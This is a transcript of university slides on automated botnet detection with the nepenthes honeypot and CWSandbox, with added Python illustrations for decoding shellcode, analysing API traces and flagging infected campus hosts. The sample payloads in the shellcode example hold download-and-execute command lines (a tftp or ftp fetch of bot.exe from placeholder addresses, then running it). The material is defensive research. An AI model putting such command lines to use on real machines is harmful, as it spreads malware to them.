Transcript of: Towards Automated Botnet Detection & Mitigation (slides)
UNIVERSITÄT MANNHEIM
Pi1 - Laboratory for Dependable Distributed Systems
Towards Automated Botnet Detection & Mitigation
Thorsten Holz, Laboratory for Dependable Distributed Systems
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Outline
• Motivation
• Tools & techniques for botnet detection
• nepenthes / mwcollect
• CWSandbox
• Results
Malware collection
• Hundreds of new malware samples each month
• How to learn more about malware?
• Quantitative & qualitative information
• Information about new malware
• Usage of honeypot-based techniques
• Use deception & emulation
nepenthes
• Tool to automatically “collect” malware like bots and other autonomous spreading malware
• Emulate known vulnerabilities and download the malware that tries to exploit them
• Available at http://nepenthes.mwcollect.org
Schematic overview
Vulnerability modules
• Emulate vulnerable services
• Play with exploits until they send us their payload
• Currently more than 20 vulnerability modules available
• More in development
• Analysis of known vulnerabilities & exploits necessary
• More research needed: ScriptGen
Vulnerability modules
• vuln_dcom (MS03-039)
• vuln_asn1 (MS04-007)
• vuln_lsass (MS04-011)
• vuln_wins (MS04-045)
• vuln_mssql/vuln_msdtc/vuln_msmq
• vuln_optix / vuln_kuang2 / vuln_bagle / vuln_mydoom (emulate the backdoors these malware families leave behind, which other malware exploits to spread)
• ...
Shellcode modules
• sch_generic_xor
• Generic XOR decoder
• sch_generic_createprocess
• Generic CreateProcess
• sch_generic_url
• Generic URL
• sch_generic_cmd
Download modules
• download_curl
• Use libcurl to download files
• download_ftp
• Emulates the Windows command-line FTP client that the shellcode would normally invoke
• download_tftp
• Implementation of TFTP
• download_csend|creceive
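The shellcode and download module lists above describe a pipeline: a handler recognises the encoder used by the captured shellcode, decodes it, pulls out the download instruction (a URL, a tftp command, an ftp script), and the core dispatches that to a download module. The block below is an added illustration of that pipeline, written for this page and not code from nepenthes: single-byte XOR recovery by scoring candidate keys, then extraction of a download job. The marker list, the regexes, the DownloadJob type and both sample payloads (a sketched decoder stub plus an XOR-encoded command line, and a plain URL) are constructed assumptions; nepenthes' real sch_generic_* handlers match hand-analysed shellcode patterns rather than generic regexes.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Strings a decoded bot payload typically carries. A generic XOR handler can
# score candidate keys by how many of them appear after decoding (assumption).
MARKERS = (b"http://", b"ftp://", b"tftp", b".exe", b"cmd ", b"get ")
DEFAULT_PORT = {"http": 80, "https": 443, "ftp": 21, "tftp": 69}

# The three download instructions recognised here; file names stop at
# whitespace, NUL and shell metacharacters so "get bot.exe>>x" is parsed right.
URL_RE = re.compile(rb"(https?|ftp|tftp)://([0-9a-z.\-]+)(?::(\d+))?(/[^\s\x00>&|]*)?", re.I)
TFTP_RE = re.compile(rb"tftp(?:\.exe)?\s+-i\s+([0-9a-z.\-]+)\s+get\s+([^\s\x00>&|]+)", re.I)
FTP_RE = re.compile(rb"open\s+([0-9a-z.\-]+)(?:\s+(\d+))?.*?get\s+([^\s\x00>&|]+)", re.I | re.S)


@dataclass
class DownloadJob:
    """What the core would hand to a download module (download_tftp, download_curl, ...)."""
    protocol: str
    host: str
    port: int
    path: str


def xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def guess_xor_key(payload: bytes) -> int:
    """Single-byte XOR recovery: pick the key whose decoding exposes the most
    markers. Key 0 means 'not encoded', so a plain payload wins as-is."""
    best_key, best_score = 0, -1
    for key in range(256):
        decoded = xor(payload, key).lower()
        score = sum(decoded.count(m) for m in MARKERS)
        if score > best_score:
            best_key, best_score = key, score
    return best_key


def extract_job(decoded: bytes) -> Optional[DownloadJob]:
    """Map the decoded payload to a download job, or None if nothing is found."""
    m = URL_RE.search(decoded)
    if m:
        proto = m.group(1).decode().lower()
        port = int(m.group(3)) if m.group(3) else DEFAULT_PORT[proto]
        return DownloadJob(proto, m.group(2).decode(), port, (m.group(4) or b"/").decode())
    m = TFTP_RE.search(decoded)
    if m:
        return DownloadJob("tftp", m.group(1).decode(), 69, m.group(2).decode())
    m = FTP_RE.search(decoded)
    if m:
        port = int(m.group(2)) if m.group(2) else 21
        return DownloadJob("ftp", m.group(1).decode(), port, m.group(3).decode())
    return None


def handle(payload: bytes) -> Tuple[int, Optional[DownloadJob]]:
    """Handler entry point: the XOR key that was used and the job to dispatch."""
    key = guess_xor_key(payload)
    return key, extract_job(xor(payload, key))


# Constructed samples (not real captures): a sketch of a decoder stub
# (xor byte [esi],0x99 / inc esi / loop; not a working stub) followed by the
# XOR-encoded command line the shellcode runs via cmd.exe, and a plain URL.
STUB = b"\xeb\x0f\x5e\x80\x36\x99\x46\xe2\xfa"
PLAIN = b"cmd /c tftp -i 10.0.0.7 get bot.exe & bot.exe\x00"
SAMPLE_XOR = STUB + xor(PLAIN, 0x99)
SAMPLE_URL = b"\x90\x90http://203.0.113.5:8080/x.exe\x00"
SAMPLE_FTP = b"echo open 192.0.2.9 2121 > x&echo user a b>>x&echo get bot.exe>>x&ftp -s:x\x00"

if __name__ == "__main__":
    for sample in (SAMPLE_XOR, SAMPLE_URL, SAMPLE_FTP):
        key, job = handle(sample)
        print(f"key=0x{key:02x} job={job}")
```

Brute-forcing the key over the whole buffer garbles the stub itself, but that does not matter: only the decoded region has to yield the download instruction. A handler that parses the stub (as the real modules do) would also learn the length of the encoded region, which this scoring approach does not need.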
Submission modules
• submit_file
• Write file to hard disk
• submit_mysql / _postgres
• Store file in database
• submit_norman
• Submit file to http://sandbox.norman.no
• submit_nepenthes
• Forward file to another nepenthes instance (used in the distributed setup)
Distributed setup
mwcollect Alliance
https://alliance.mwcollect.org
Statistics: nepenthes
• Four months nepenthes on /18 network:
• 50,000,000+ files downloaded
• 14,000+ unique binaries based on md5sum
• ~1,000 different botnets
• Anti-virus engines detect between 70% and 90% of the binaries
• Korgobot/Padobot dominates
Results for /18
• In-/Outbound traffic and TCP connections
Results for /18
• logged_downloads and logged_submissions
CWSandbox: automatically analyzing a collected binary
Overview
• Automatic behaviour analysis
• Execute the binary and observe what it is doing
• Similar to Norman Sandbox
• Currently early beta version available
• Results look promising
• Currently unsure how / when to release it
Schematic overview
• CWSandbox & CWMonitor.dll
CWSandbox
1. Introduction
Nowadays a lot of malicious applications exist, and due to the heavy use of e-mail and web surfing they spread very fast and very widely. In order to prevent their harmful effects and to stop their further distribution, such malware has to be analyzed. This is normally done by disassembling, which is very time-consuming and sometimes very difficult. A different way is automatic behaviour analysis, which is what the CWSandbox does. In this dynamic analysis the malware is executed in a controlled environment. All of its actions are monitored, logged and can be blocked if necessary. After the malware has run, the collected data is analyzed. This approach is orders of magnitude faster than disassembling, can be done by people without any programming skills, and delivers good results, with the caveat that only behaviour the sample actually exhibits during the run is observed.
2. Architecture
The CWSandbox executes the malware, injects CWMonitor.dll into it and communicates with this DLL during the whole execution. When the malware starts another process or a Windows service, the CWSandbox is informed beforehand and injects another instance of the monitoring DLL into the new process before it starts running.
When enough information about the malware has been collected or an adjustable timeout is reached, the CWSandbox terminates the malware process(es) and analyzes the collected data. To limit harmful side effects, the malware can also be terminated early when certain conditions are detected, e.g. when more than 10 ICMP requests are made (to keep it from taking part in DoS attacks). The monitoring and the analysis steps are described in detail in the following two sections.
3. The monitoring
In Windows nearly all accesses to system resources go through the Windows API. The API offers functions to access the file system and the registry, to execute other applications, and to install, start or stop Windows services. It also offers the WinSock functions, which are normally used to communicate over TCP/IP networks such as the Internet. The API is implemented by several DLLs located in the Windows system directory.
Inner working
• DLL injection and API hooking
• Hooking of API calls from kernel32.dll, ws2_32.dll, mswsock.dll, user32.dll, ...
• Tracing of functions for file access, process access, Winsock communication, registry, ...
• Execution for 3 minutes, then processing of results ➙ Analysis log
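The architecture and monitoring sections above describe what the hooked API calls deliver and what the sandbox does with them: follow child processes the monitor DLL was injected into, record file, registry, process and WinSock activity, abort the run when the ICMP threshold is exceeded, and turn the trace into an analysis log. The block below is an added illustration of that post-processing step, written for this page and not CWSandbox code: it walks a constructed API-call trace and produces a report with the persistence entries, the IRC C&C server and channel learned from the sample's own NICK/USER/JOIN messages, and the early-termination decision. The "pid;api;k=v" event format, the API names as spelled here, the sample trace and the IP address 198.51.100.23 are all assumptions made for the example.

```python
from dataclasses import dataclass, field
from typing import Iterable, List, Optional, Tuple

ICMP_LIMIT = 10   # abort after more than this many ICMP requests (threshold from the text)
AUTOSTART = ("\\currentversion\\run", "\\currentversion\\runonce", "\\services\\")


@dataclass
class Report:
    files_written: List[str] = field(default_factory=list)
    autostart: List[Tuple[str, str]] = field(default_factory=list)   # (key\name, data)
    processes: List[str] = field(default_factory=list)
    connections: List[Tuple[str, int]] = field(default_factory=list)
    irc_cnc: Optional[Tuple[str, int, str]] = None                   # (host, port, channel)
    icmp_requests: int = 0
    terminated: Optional[str] = None                                 # early-abort reason


def parse_event(line: str):
    """'pid;api;k=v;k=v' -> (pid, api, {k: v}); this format is the example's own."""
    pid, api, *rest = line.split(";")
    return pid, api, dict(f.split("=", 1) for f in rest)


def analyze(lines: Iterable[str]) -> Report:
    report = Report()
    monitored = set()             # pids that carry the monitor DLL
    for line in lines:
        if not line.strip():
            continue
        pid, api, kv = parse_event(line)
        if not monitored:
            monitored.add(pid)    # the sample itself
        if pid not in monitored:
            continue              # not one of our processes, ignore
        if api.startswith("CreateFile") and "WRITE" in kv.get("access", ""):
            report.files_written.append(kv["path"])
        elif api.startswith("RegSetValueEx"):
            if any(k in kv["key"].lower() for k in AUTOSTART):
                report.autostart.append((kv["key"] + "\\" + kv["name"], kv["data"]))
        elif api.startswith("CreateProcess"):
            report.processes.append(kv["path"])
            monitored.add(kv["childpid"])   # DLL injected before the child runs
        elif api == "connect":
            report.connections.append((kv["host"], int(kv["port"])))
        elif api == "send":
            verb, _, arg = kv["data"].partition(" ")
            if verb.upper() in ("NICK", "USER", "JOIN"):
                channel = report.irc_cnc[2] if report.irc_cnc else ""
                if verb.upper() == "JOIN":
                    channel = arg.split()[0]
                report.irc_cnc = (kv["host"], int(kv["port"]), channel)
        elif api == "IcmpSendEcho":
            report.icmp_requests += 1
            if report.icmp_requests > ICMP_LIMIT:
                report.terminated = f"more than {ICMP_LIMIT} ICMP requests (possible DoS)"
                break             # terminate the sample instead of letting it flood
    return report


# Constructed trace (not a real capture): drop a copy, add a Run key,
# start the copy, join an IRC C&C channel, then start pinging.
TRACE = r"""
1204;CreateFileW;path=C:\WINDOWS\system32\wuauclt32.exe;access=GENERIC_WRITE
1204;RegSetValueExA;key=HKLM\Software\Microsoft\Windows\CurrentVersion\Run;name=Windows Update;data=wuauclt32.exe
1204;CreateProcessA;path=C:\WINDOWS\system32\wuauclt32.exe;childpid=1388
1388;connect;host=198.51.100.23;port=6667
1388;send;host=198.51.100.23;port=6667;data=NICK [DEU|00|12345]
1388;send;host=198.51.100.23;port=6667;data=USER xyz 0 0 :xyz
1388;send;host=198.51.100.23;port=6667;data=JOIN #botz secretkey
""".strip().splitlines()
TRACE += [f"1388;IcmpSendEcho;dst=10.0.0.{i}" for i in range(1, 12)]
TRACE += ["1388;CreateFileW;path=C:\\never.txt;access=GENERIC_WRITE"]   # after the abort

if __name__ == "__main__":
    print(analyze(TRACE))
```

The C&C tuple is the piece of the report that feeds mitigation: once the IRC server and channel are known, the server can be blackholed or the channel monitored, which is the "analysis of captured malware can help to protect other machines" point of the use-case slides.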
Putting it together: towards automated botnet detection & mitigation
Conclusion
• Honeypot-based techniques can help us to learn more about autonomous spreading malware
• With the help of automated capture and analysis, we can efficiently detect botnets
• Local and global mitigation possible
• Needs more research, e.g., 0day-support
Dipl. Inform. Thorsten Holz
http://www-pi1.informatik.uni-mannheim.de/
[email protected]
More information: http://honeyblog.org
nepenthes: use case
• Usage of nepenthes as an early-warning system in pilot project together with University of Karlsruhe
• Listen on all unused IP addresses
• Only reachable from within campus network
• Detect infected machines
• Inform administrator
nepenthes: use case
nepenthes: use case
• Within two months: detection of 28 infected machines within campus network
• Alternative to netflow-based techniques
• Low (no?) false positives
• Automated blocking of infected machines?
• Analysis of captured malware can help to protect other machines, e.g. blackhole C&C server
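The use-case slides describe the early-warning loop: a nepenthes sensor listens on unused campus addresses, every campus host that delivers a payload to it is infected, the administrator is informed, and blocking can be automated. The block below is an added illustration of that loop over the sensor's logged_downloads file, written for this page and not part of nepenthes or the Karlsruhe pilot. The line shape "[timestamp] attacker -> url" is an assumption about the log format (check your own installation), and the campus prefix 10.20.0.0/18, the sample lines and the iptables syntax for the block rules are constructed for the example.

```python
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Set

# Campus prefix the sensor is reachable from (constructed for this example).
CAMPUS = ipaddress.ip_network("10.20.0.0/18")

# Assumed line shape of logged_downloads: "[timestamp] attacker -> url".
LINE_RE = re.compile(r"^\[(\S+)\]\s+(\S+)\s+->\s+(\S+)$")


@dataclass
class Infection:
    host: str
    first_seen: str
    last_seen: str
    hits: int = 0
    urls: Set[str] = field(default_factory=set)


def detect(lines: Iterable[str], campus=CAMPUS) -> Dict[str, Infection]:
    """A campus address that completed an exploit against an unused IP and
    handed over a payload is an infected machine; nothing legitimate talks
    to those addresses, so a single record is already strong evidence."""
    found: Dict[str, Infection] = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue                         # not a download record, skip
        ts, src, url = m.groups()
        try:
            ip = ipaddress.ip_address(src)
        except ValueError:
            continue
        if ip not in campus:
            continue                         # outside the campus, not ours to alert on
        inf = found.setdefault(src, Infection(src, ts, ts))
        inf.last_seen = ts
        inf.hits += 1
        inf.urls.add(url)
    return found


def alert_text(inf: Infection) -> str:
    """What the administrator gets to see for one infected host."""
    return (f"infected host {inf.host}: {inf.hits} payload(s) delivered to the sensor "
            f"between {inf.first_seen} and {inf.last_seen}; URLs: {', '.join(sorted(inf.urls))}")


def block_rules(infections: Dict[str, Infection]) -> List[str]:
    """Firewall lines for the automated-blocking option (iptables syntax as
    the illustration; a router ACL would carry the same addresses)."""
    return [f"iptables -I FORWARD -s {host} -j DROP" for host in sorted(infections)]


# Constructed log lines, not a real capture.
SAMPLE_LOG = """
[2006-05-02T09:14:03] 10.20.7.44 -> tftp://10.20.7.44:69/msupdate.exe
[2006-05-02T09:14:09] 10.20.7.44 -> tftp://10.20.7.44:69/msupdate.exe
[2006-05-02T09:20:51] 10.20.33.8 -> http://198.51.100.60:3142/x.exe
[2006-05-02T09:21:17] 203.0.113.77 -> ftp://203.0.113.77:21/bot.exe
this line is not a download record
""".strip().splitlines()

if __name__ == "__main__":
    infections = detect(SAMPLE_LOG)
    for inf in infections.values():
        print(alert_text(inf))
    print("\n".join(block_rules(infections)))
```

The URLs kept per host are worth carrying into the alert: a tftp URL pointing back at the attacker means the infected machine serves the binary itself, while an http URL on a third host is a download server that can be blocked or reported in addition to the infected client.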